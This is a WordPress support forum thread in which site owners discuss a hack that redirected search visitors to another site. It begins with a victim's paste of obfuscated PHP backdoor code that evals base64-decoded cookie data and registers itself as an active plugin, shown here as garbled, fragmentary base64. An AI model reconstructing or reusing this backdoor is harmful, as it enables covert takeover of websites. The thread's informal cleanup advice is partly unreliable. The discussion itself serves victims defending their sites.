0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3Rpd*/strrev($trp_m[1])/* GFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3Rpd*/);/* GFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3Rpd*/$trp_f();/* GFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3RpdGFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3Rpd*/ ?>

    How can I block this hacking attemps? I don’t know how the hacker add these code to an image and, of course, to my MySQL database to get out the visitors arriving from google out from my website.

Viewing 15 replies - 1 through 15 (of 41 total)
1 2 3
  • jonimueller

    (@jonimueller)

    15 years, 10 months ago

    You’re running on an unsecure version of WP; the hack was inevitable. Notify your webhost of the breach; locate a backup of your database .. you do have a backup, right?

    πŸ˜‰

    Thread Starter patrickdappollonio

    (@patrickdappollonio)

    15 years, 10 months ago

    Ifn anything needs more information about the attack, my visitors goes to your-needs.info finding the same string that they find at Google.

    If you want to fix by the moment, you can find into the wp_options table at the MySQL database, the table that store the active_plugins and on it, find a “plugin” working with a image extension, that has any name, like your themes images or post images can you have uploaded, when you find them, don’t delete the lines at the MySQL database, but find the image/plugin in your directories accesing by ftp and download to your computer and open them with a Notepad or another plain text editor and then delete all the content -the content is like my old post showing up- and upload it again.

    Then, try to access to your weblog using a google search. If the problem persist, find this “rss_f541b3abd05e7962fcab37737f40fad8” in the MySQL server and delete all the content that you have founded.

    Attention: Doing this can get the widget rss support quite inestable, but them repair the exiting visitors leaving your webpage with the code.

    If I find another way to correct them, I’ve posted them here.

    Wood & Co Creative

    (@wicked9690)

    15 years, 10 months ago

    I have had this happen to some of my older wordpress blogs also this past week, with the redirection going to the same site; your-needs.info. I noticed this also affects searches going through Yahoo.

    Thanks for the fix Patrick.

    goldford

    (@goldford)

    15 years, 10 months ago

    Thanks very much for the fix!

    Wood & Co Creative

    (@wicked9690)

    15 years, 10 months ago

    I think this is going to turn out to be a pretty big exploit that is just gathering steam:

    http://twitter.com/stml/statuses/822612130

    Thread Starter patrickdappollonio

    (@patrickdappollonio)

    15 years, 10 months ago

    You’re Welcome, wicked and goldford. I’m looking for a most convenient fix to this hack, but maybe the upgrade to a newest version os WordPress has the best.

    Dalton Rooney

    (@daltonrooney)

    15 years, 10 months ago

    Can we just confirm here: this is a hack that affects WordPress 2.5.1 and isn’t attributable to a configuration problem or insecure plugin?

    If so, are the developers working on it and has there been an announcement?

    moshu

    (@moshu)

    15 years, 10 months ago

    If you read the posts above – it is always older versions and not 2.5.1. That’s the point. People don’t upgrade = get hacked.

    Dalton Rooney

    (@daltonrooney)

    15 years, 10 months ago

    Hi Moshu,
    I’m sorry, I realize that in this particular case the O.P. was not running the newest version, but I have been hearing that others are getting hacked on 2.5.1… that’s how I ended up on this thread. I was just hoping that someone could verify.

    And for the record, I think it would be great if the WordPress devs could continue to support older versions for just a little while. It would be great if I could pay someone to roll back security fixes into the 2.3 line for at least 6 months to 1 year, because I know some people are not anxious to upgrade to 2.5 just yet.

    jonimueller

    (@jonimueller)

    15 years, 10 months ago

    Well are they anxious to get hacked? You can’t have your cake and eat it too. Either roll back to 2.0.11 or move forward with the latest, greatest, most stable and secure, or risk being hacked. Those are the options.

    stml

    (@stml)

    15 years, 10 months ago

    This hack is quite seriously widespread, in that I’m noticing it quite regularly in blog results from Google (as per my tweet someone has posted above), now others have noticed in Yahoo.

    There seems to be little info about it on the web – is it time some more senior Devs looked at this a little more closely?

    Thread Starter patrickdappollonio

    (@patrickdappollonio)

    15 years, 10 months ago

    Navigationg with other posts when the users has the same attack, I’ve looked for an user has the 2.5.1 version and was hacked, too.

    By first font I don’t know if this happened with an older version or the newest. I’ve sended a message from the contact form to Automattic, but doesn’t send me an answer.

    (If you’re a spanish speaker, the solution is in my Weblog: http://www.marlexsystems.org/mis-visitas-se-redireccionan-hacia-your-needsinfo-que-hacer/)

    Update: In this post an WordPress user say that all version of WP are hacked. He has a few WordPress blogs from 2.1 to 2.5.1 and all has hacked.

    jonimueller

    (@jonimueller)

    15 years, 10 months ago

    I think the problem with stating that 2.5.1 was also hacked is that it’s quite possible (in fact, it’s probably highly likely) that the hack occurred BEFORE the upgrade and the hacked files were already present when the database was upgraded. Especially if the site owners were unaware that a hack had taken place when they performed the upgrade.

    Thread Starter patrickdappollonio

    (@patrickdappollonio)

    15 years, 10 months ago

    Reading a bit, I’ve founded the problem: http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html That say about a function can edit anything if you have an account.

    (En espaΓ±ol: http://www.marlexsystems.org/detectado-el-como-se-realizo-el-hackeo-a-los-blogs-de-wordpress/)

    whooami

    (@whooami)

    15 years, 10 months ago

    patrickdappollonio,

    There are enough WP exploits out that at this point, that it’s a rather safe bet that any number of points of entry can result in a similar symptom.

    if file A can be exploited ⊒ result C
    if file B can be exploited ⊒ result C

    Its the same result, just a different problem.

    Result C doesnt necessarily mean that file A was exploited.

    If you want a secure site, than you have to stay up on the upgrades, you have to make sure that you upgrade properly, you have to keep up on plugin upgrades, you have to have be mindful of file and directory permissions, etc..

    And once compromised, the files should be wiped and replaced, the passwords should all be changed, the secret key should be changed, and the databse should be scoured for anything malicious.

Viewing 15 replies - 1 through 15 (of 41 total)
1 2 3
  • The topic ‘I was hacked’ is closed to new replies.